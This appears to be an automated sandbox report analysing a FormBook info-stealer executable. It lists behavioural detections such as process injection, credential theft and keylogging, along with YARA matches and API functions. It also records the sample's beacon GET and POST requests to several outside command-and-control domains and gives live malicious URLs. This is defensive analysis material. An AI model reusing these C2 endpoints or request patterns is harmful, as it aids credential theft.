Windows Analysis Report
s7Okni1gfE.exe

Overview

General Information

Sample name: s7Okni1gfE.exe (renamed because the original name is a hash value)
Original sample name: fb5a580f87999b4acfc3088dfcde8a710d620c005df30cfa0bca94bf3bcdbb89.exe
Analysis ID: 1569366
MD5: 19730719a742ee889c6bd0b9e635d234
SHA1: bdf8492135d88c88050319d017cbb49779f81f59
SHA256: fb5a580f87999b4acfc3088dfcde8a710d620c005df30cfa0bca94bf3bcdbb89
Tags: exe, Formbook, user-adrian__luca

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Yara detected FormBook
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
Found direct / indirect Syscall (likely to bypass EDR)
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evaded block containing many API calls
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Uncommon Svchost Parent Process
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • s7Okni1gfE.exe (PID: 5864 cmdline: "C:\Users\user\Desktop\s7Okni1gfE.exe" MD5: 19730719A742EE889C6BD0B9E635D234)
    • svchost.exe (PID: 636 cmdline: "C:\Users\user\Desktop\s7Okni1gfE.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
      • WNGaDiurNI.exe (PID: 5316 cmdline: "C:\Program Files (x86)\VFEnTIqdxoPLQMpedaWkbDHwMhQJAtjMHViLFByrHORVEofjn\WNGaDiurNI.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • clip.exe (PID: 5124 cmdline: "C:\Windows\SysWOW64\clip.exe" MD5: E40CB198EBCD20CD16739F670D4D7B74)
          • WNGaDiurNI.exe (PID: 3164 cmdline: "C:\Program Files (x86)\VFEnTIqdxoPLQMpedaWkbDHwMhQJAtjMHViLFByrHORVEofjn\WNGaDiurNI.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 5956 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
00000008.00000002.2717205821.0000000000FE0000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
00000008.00000002.2717205821.0000000000FE0000.00000040.80000000.00040000.00000000.sdmp | Windows_Trojan_Formbook_1112e116 | unknown | unknown
  • 0x449f6:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x2cb75:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000007.00000002.2717771387.0000000004800000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
00000007.00000002.2717771387.0000000004800000.00000004.00000800.00020000.00000000.sdmp | Windows_Trojan_Formbook_1112e116 | unknown | unknown
  • 0x2bb60:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x13cdf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000007.00000002.2714904794.0000000002920000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
(11 further entries not shown)

Source | Rule | Description | Author | Strings
2.2.svchost.exe.400000.0.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
2.2.svchost.exe.400000.0.unpack | Windows_Trojan_Formbook_1112e116 | unknown | unknown
  • 0x2e033:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x161b2:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
2.2.svchost.exe.400000.0.raw.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
2.2.svchost.exe.400000.0.raw.unpack | Windows_Trojan_Formbook_1112e116 | unknown | unknown
  • 0x2ee33:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x16fb2:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01

            System Summary

            Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "C:\Users\user\Desktop\s7Okni1gfE.exe", CommandLine: "C:\Users\user\Desktop\s7Okni1gfE.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\s7Okni1gfE.exe", ParentImage: C:\Users\user\Desktop\s7Okni1gfE.exe, ParentProcessId: 5864, ParentProcessName: s7Okni1gfE.exe, ProcessCommandLine: "C:\Users\user\Desktop\s7Okni1gfE.exe", ProcessId: 636, ProcessName: svchost.exe
            Source: Process started | Author: vburov | Data: Command: "C:\Users\user\Desktop\s7Okni1gfE.exe", CommandLine: "C:\Users\user\Desktop\s7Okni1gfE.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\s7Okni1gfE.exe", ParentImage: C:\Users\user\Desktop\s7Okni1gfE.exe, ParentProcessId: 5864, ParentProcessName: s7Okni1gfE.exe, ProcessCommandLine: "C:\Users\user\Desktop\s7Okni1gfE.exe", ProcessId: 636, ProcessName: svchost.exe
            No Suricata rule has matched

            AV Detection

            Source: http://www.ngmr.xyz/qj8y/ | Avira URL Cloud: Label: malware
            Source: http://www.zz82x.top/fk06/ | Avira URL Cloud: Label: malware
            Source: http://www.ngmr.xyz/qj8y/?DTs4CD4=VLsx0gmXQ4Y/FgugnqZTvhP9ZMzds9qWdo+Du/rvWhX0yMPY213bdk6OAmkXBQAvHZvuSU6Z1Lmt8KkEin8FkCRkth5DL64qsZwfe0mtTtD39/jv9X5U82qLTQbZ+JYXlg==&v4=NRh8 | Avira URL Cloud: Label: malware
            Source: http://www.zz82x.top/fk06/?v4=NRh8&DTs4CD4=6yamV9jmlYISo7pFsUNUJnURbxlWMYSXh3BqDS1TUCORGSKgOxEODjfkqzZEFLLIdUGYwb6HBQxj6hxrw3bE5aW7dF6zoZiXL70TyEdlD9ZsDXa5xNUzKEaTljshjAVXAQ== | Avira URL Cloud: Label: malware
            Source: http://www.ngmr.xyz | Avira URL Cloud: Label: malware
            Source: s7Okni1gfE.exe | ReversingLabs: Detection: 73%
            Source: Yara match | File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 00000008.00000002.2717205821.0000000000FE0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000007.00000002.2717771387.0000000004800000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000007.00000002.2714904794.0000000002920000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000007.00000002.2715513437.0000000002F00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000002.00000002.1960347440.0000000002B20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000002.00000002.1960938102.0000000003350000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000006.00000002.2718155143.0000000002A80000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000002.00000002.1959958040.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
            Source: s7Okni1gfE.exe | Joe Sandbox ML: detected
            Source: s7Okni1gfE.exe | Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: WNGaDiurNI.exe, 00000006.00000000.1885629336.00000000007FE000.00000002.00000001.01000000.00000005.sdmp, WNGaDiurNI.exe, 00000008.00000002.2714957354.00000000007FE000.00000002.00000001.01000000.00000005.sdmp
            Source: Binary string: wntdll.pdbUGP source: s7Okni1gfE.exe, 00000000.00000003.1471551879.0000000003950000.00000004.00001000.00020000.00000000.sdmp, s7Okni1gfE.exe, 00000000.00000003.1481387538.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1867213112.0000000002C00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1960456440.000000000319E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1960456440.0000000003000000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1869054817.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, clip.exe, 00000007.00000003.1962366849.00000000049B8000.00000004.00000020.00020000.00000000.sdmp, clip.exe, 00000007.00000003.1959840687.0000000004806000.00000004.00000020.00020000.00000000.sdmp, clip.exe, 00000007.00000002.2718534138.0000000004B60000.00000040.00001000.00020000.00000000.sdmp, clip.exe, 00000007.00000002.2718534138.0000000004CFE000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: s7Okni1gfE.exe, 00000000.00000003.1471551879.0000000003950000.00000004.00001000.00020000.00000000.sdmp, s7Okni1gfE.exe, 00000000.00000003.1481387538.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000003.1867213112.0000000002C00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1960456440.000000000319E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1960456440.0000000003000000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1869054817.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, clip.exe, 00000007.00000003.1962366849.00000000049B8000.00000004.00000020.00020000.00000000.sdmp, clip.exe, 00000007.00000003.1959840687.0000000004806000.00000004.00000020.00020000.00000000.sdmp, clip.exe, 00000007.00000002.2718534138.0000000004B60000.00000040.00001000.00020000.00000000.sdmp, clip.exe, 00000007.00000002.2718534138.0000000004CFE000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: clip.pdb source: svchost.exe, 00000002.00000003.1928526995.000000000081A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1960250911.0000000000800000.00000004.00000020.00020000.00000000.sdmp, WNGaDiurNI.exe, 00000006.00000002.2716834616.0000000000D18000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: svchost.pdb source: clip.exe, 00000007.00000002.2715641135.0000000002F75000.00000004.00000020.00020000.00000000.sdmp, clip.exe, 00000007.00000002.2721152955.000000000518C000.00000004.10000000.00040000.00000000.sdmp, WNGaDiurNI.exe, 00000008.00000000.2034752534.0000000002FFC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000A.00000002.2264337034.0000000036D0C000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: svchost.pdbUGP source: clip.exe, 00000007.00000002.2715641135.0000000002F75000.00000004.00000020.00020000.00000000.sdmp, clip.exe, 00000007.00000002.2721152955.000000000518C000.00000004.10000000.00040000.00000000.sdmp, WNGaDiurNI.exe, 00000008.00000000.2034752534.0000000002FFC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000A.00000002.2264337034.0000000036D0C000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: clip.pdbGCTL source: svchost.exe, 00000002.00000003.1928526995.000000000081A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1960250911.0000000000800000.00000004.00000020.00020000.00000000.sdmp, WNGaDiurNI.exe, 00000006.00000002.2716834616.0000000000D18000.00000004.00000020.00020000.00000000.sdmp
            Source: C:\Users\user\Desktop\s7Okni1gfE.exe | Code function: 0_2_00846CA9 GetFileAttributesW,FindFirstFileW,FindClose | 0_2_00846CA9
            Source: C:\Users\user\Desktop\s7Okni1gfE.exe | Code function: 0_2_008460DD _wcscat,_wcscat,__wsplitpath,FindFirstFileW,DeleteFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose | 0_2_008460DD
            Source: C:\Users\user\Desktop\s7Okni1gfE.exe | Code function: 0_2_008463F9 _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose | 0_2_008463F9
            Source: C:\Users\user\Desktop\s7Okni1gfE.exe | Code function: 0_2_0084EB60 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose | 0_2_0084EB60
            Source: C:\Users\user\Desktop\s7Okni1gfE.exe | Code function: 0_2_0084F5FA FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf | 0_2_0084F5FA
            Source: C:\Users\user\Desktop\s7Okni1gfE.exe | Code function: 0_2_0084F56F FindFirstFileW,FindClose | 0_2_0084F56F
            Source: C:\Users\user\Desktop\s7Okni1gfE.exe | Code function: 0_2_00851B2F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose | 0_2_00851B2F
            Source: C:\Users\user\Desktop\s7Okni1gfE.exe | Code function: 0_2_00851C8A SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose | 0_2_00851C8A
            Source: C:\Users\user\Desktop\s7Okni1gfE.exe | Code function: 0_2_00851F94 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose | 0_2_00851F94

            Networking

            Source: DNS query: www.ngmr.xyz
            Source: Joe Sandbox View | IP Address: 38.47.232.196
            Source: Joe Sandbox View | IP Address: 54.67.87.110
            Source: Joe Sandbox View | ASN Name: AMAZON-02US
            Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1 (5 occurrences)
            Source: C:\Users\user\Desktop\s7Okni1gfE.exe | Code function: 0_2_00854EB5 InternetReadFile,InternetQueryDataAvailable,InternetReadFile | 0_2_00854EB5
            Source: global traffic | HTTP traffic detected:
              GET /r22w/?v4=NRh8&DTs4CD4=EsRXX7vEnUJAP459o9EPGhG/Za1TDqKo9/nSY7LZO6ky9vo/5zux77ZaoqJdw57Nhrisf5e1C3TQFLNLiNcqIHJwhSyssg2wbtb6j1AMMcve2PeTzyq3dg5968Ye3A3R7Q== HTTP/1.1
              Host: www.healthyloveforall.net
              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
              Accept-Language: en-US,en;q=0.9
              Connection: close
              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
            Source: global traffic | HTTP traffic detected:
              GET /fk06/?v4=NRh8&DTs4CD4=6yamV9jmlYISo7pFsUNUJnURbxlWMYSXh3BqDS1TUCORGSKgOxEODjfkqzZEFLLIdUGYwb6HBQxj6hxrw3bE5aW7dF6zoZiXL70TyEdlD9ZsDXa5xNUzKEaTljshjAVXAQ== HTTP/1.1
              Host: www.zz82x.top
              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
              Accept-Language: en-US,en;q=0.9
              Connection: close
              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
            Source: global traffic | HTTP traffic detected:
              GET /mgg3/?DTs4CD4=gEC8KgLUidSdu/LaJDm0wdgPKykh22cq0AnLcRTEvs4H+h+Cn5seN/p6ZNIXUcjC7qbBK+lucO22lGJyLeY23gB1m4CBXHBSkrnrwKbx/qmY6AwmTWdie10g6VbJmKkWlw==&v4=NRh8 HTTP/1.1
              Host: www.ophthalmo.cloud
              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
              Accept-Language: en-US,en;q=0.9
              Connection: close
              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
            Source: global traffic | HTTP traffic detected:
              GET /qj8y/?DTs4CD4=VLsx0gmXQ4Y/FgugnqZTvhP9ZMzds9qWdo+Du/rvWhX0yMPY213bdk6OAmkXBQAvHZvuSU6Z1Lmt8KkEin8FkCRkth5DL64qsZwfe0mtTtD39/jv9X5U82qLTQbZ+JYXlg==&v4=NRh8 HTTP/1.1
              Host: www.ngmr.xyz
              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
              Accept-Language: en-US,en;q=0.9
              Connection: close
              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
            Source: global traffic | DNS traffic detected: DNS query: www.healthyloveforall.net
            Source: global traffic | DNS traffic detected: DNS query: www.bonusgame2024.online
            Source: global traffic | DNS traffic detected: DNS query: www.zz82x.top
            Source: global traffic | DNS traffic detected: DNS query: www.ophthalmo.cloud
            Source: global traffic | DNS traffic detected: DNS query: www.ngmr.xyz
            Source: unknown | HTTP traffic detected:
              POST /fk06/ HTTP/1.1
              Host: www.zz82x.top
              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
              Accept-Language: en-US,en;q=0.9
              Accept-Encoding: gzip, deflate, br
              Origin: http://www.zz82x.top
              Connection: close
              Content-Length: 208
              Cache-Control: max-age=0
              Content-Type: application/x-www-form-urlencoded
              Referer: http://www.zz82x.top/fk06/
              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
              Data: form field DTs4CD4 carrying a 208-byte encoded value (raw dump omitted)
            Source: global traffic | HTTP traffic detected:
              HTTP/1.1 404 Not Found
              Server: nginx
              Date: Thu, 05 Dec 2024 17:22:39 GMT
              Content-Type: text/html
              Content-Length: 548
              Connection: close
              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
            Source: global traffic | HTTP traffic detected:
              HTTP/1.1 404 Not Found
              Server: nginx
              Date: Thu, 05 Dec 2024 17:22:44 GMT
              Content-Type: text/html
              Content-Length: 548
              Connection: close
              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
            Source: global traffic | HTTP traffic detected:
              HTTP/1.1 404 Not Found
              Server: nginx
              Date: Thu, 05 Dec 2024 17:22:47 GMT
              Content-Type: text/html
              Content-Length: 548
              Connection: close
              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
            Source: global traffic | HTTP traffic detected:
              HTTP/1.1 404 Not Found
              Content-Type: text/html
              Transfer-Encoding: chunked
              Connection: close
              Date: Thu, 05 Dec 2024 17:22:54 GMT
              Server: Apache
              X-Frame-Options: deny
              Content-Encoding: gzip
              Data: gzip-compressed chunked body (raw dump omitted)
            Source: global traffic | HTTP traffic detected:
              HTTP/1.1 404 Not Found
              Content-Type: text/html
              Transfer-Encoding: chunked
              Connection: close
              Date: Thu, 05 Dec 2024 17:22:57 GMT
              Server: Apache
              X-Frame-Options: deny
              Content-Encoding: gzip
              Data: gzip-compressed chunked body (raw dump omitted)
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeDate: Thu, 05 Dec 2024 17:22:59 GMTServer: ApacheX-Frame-Options: denyContent-Encoding: gzipData Raw: 32 33 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 85 54 4d 6f d3 40 10 bd f7 57 4c 8d 50 40 c4 71 7a 43 89 dd 03 b4 54 20 a8 2b 35 12 42 e2 b2 f6 8e ed 69 ed dd 68 77 9d 0f 10 ff 9d f1 3a 91 12 e2 92 5c a2 9d 8f f7 76 df 9b 71 7c 79 93 7e 5c fc 78 b8 85 ca 35 f5 f5 45 dc ff 41 5c a1 90 d7 17 00 71 83 4e 40 5e 09 63 d1 25 41 eb 8a f0 7d e0 13 d6 6d 6b 04 b7 5d 62 12 38 dc b8 28 b7 d6 67 3c d4 18 32 2d b7 63 78 b5 14 c6 29 34 63 a0 c2 88 06 e1 37 83 1e ff 2a a4 b2 72 b3 ab e9 f4 f5 fc 24 b9 26 e9 aa 17 72 8d 30 25 a9 d9 f4 b4 6b 29 a4 24 55 0e a5 32 6d 24 9a a1 8c 6e 5d 4d 0a 87 52 85 56 2e b4 f4 0b 5f b8 c9 0a 8d a3 5c d4 a1 a8 a9 54 b3 4c 58 ec a0 4e 2f 96 89 fc b9 34 ba 55 72 e6 8c 50 96 d5 41 e5 8e eb fe 1c 89 d0 c9 38 20 9a 66 ca a2 d6 eb 59 45 52 a2 3a 45 88 23 6f d0 81 87 fc 06 e6 4a 82 fb f4 7b 00 8a bd 48 02 dc 2c c9 60 6f db ce e9 7d 15 29 89 9b 31 14 ba 66 96 31 88 ba de 37 dd a5 e9 dd d7 db 0f e9 a2 9f 83 7e 40 ce b7 19 9d 69 b7 a3 ba 0c 43 f8 e4 91 d9 25 f8 c6 23 16 2e 44 09 05 6d d0 82 65 21 39 1c 92 b5 2d 1f b5 82 46 67 c4 b3 26 71 45 39 47 c2 70 e0 55 7e 50 92 be 24 f4 87 39 90 22 47 ec 4a 87 88 c9 d5 64 3a 87 46 6c a8 69 9b c3 50 6b d1 f8 b3 c8 b8 6a 3a df bf 73 45 b8 5e 6a e3 ba 67 c6 d1 6e 21 e2 ce 0f 4f 2f 69 05 24 93 60 37 e0 bd 18 11 47 7d d6 e6 86 96 ee 70 3d 9e c4 4a f4 d1 7e 4b a4 ce db 86 0d 99 ac 0d 39 7c 73 64 fa 7e 41 46 f1 7f 71 a0 16 aa 6c 45 c9 4e 7e 61 f4 47 cf 19 8c 06 a1 f6 90 ef 60 64 4d 9e 04 51 64 51 6a be fc 33 6b 3d c9 75 13 15 a6 e9 8e d1 b9 fe 35 8f 86 5e 4f 6a 9d 0b 47 5a 4d 2a 6d 1d 30 ec d9 c6 d1 e7 f4 3e 7d 7c e8 29 6f 6e cf f1 8c a2 ee 3a 93 27 9e 99 e1 52 e6 8c 7f 46 bd 42 ff 94 bc ed 16 82 57 c0 2b e2 fd eb 7d 63 1f bb ef dc 5f 9d a7 e3 e7 f7 04 00 00 0d 0a 30 0d 0a 0d 0a Data 
Ascii: 239TMo@WLP@qzCT +5Bihw:\vq|y~\x5EA\qN@^c%A}mk]b8(g<2-cx)4c7*r$&r0%k)$U2m$n]MRV._\TLXN/4UrPA8 fYER:E#oJ{H,`o})1f17~@iC%#.Dme!9-Fg&qE9GpU~P$9"GJd:FliPkj:sE^jgn!O/i$`7G}p=J~K9|sd~AFqlEN~aG`dMQdQj3k=u5^OjGZM*m0>}|)on:'RFBW+}c_0
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlContent-Length: 1271Connection: closeDate: Thu, 05 Dec 2024 17:23:02 GMTServer: ApacheX-Frame-Options: denyData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 68 74 6d 6c 2c 20 62 6f 64 79 2c 20 23 70 61 72 74 6e 65 72 2c 20 69 66 72 61 6d 65 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3a 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 72 64 65 72 3a 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6f 75 74 6c 69 6e 65 3a 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 62 61 73 65 6c 69 6e 65 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 74 72 61 6e 73 70 61 72 65 6e 74 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 3c 2f 73 74 79 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 4e 4f 57 22 20 6e 61 6d 65 3d 22 65 78 70 69 72 65 73 22 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 2c 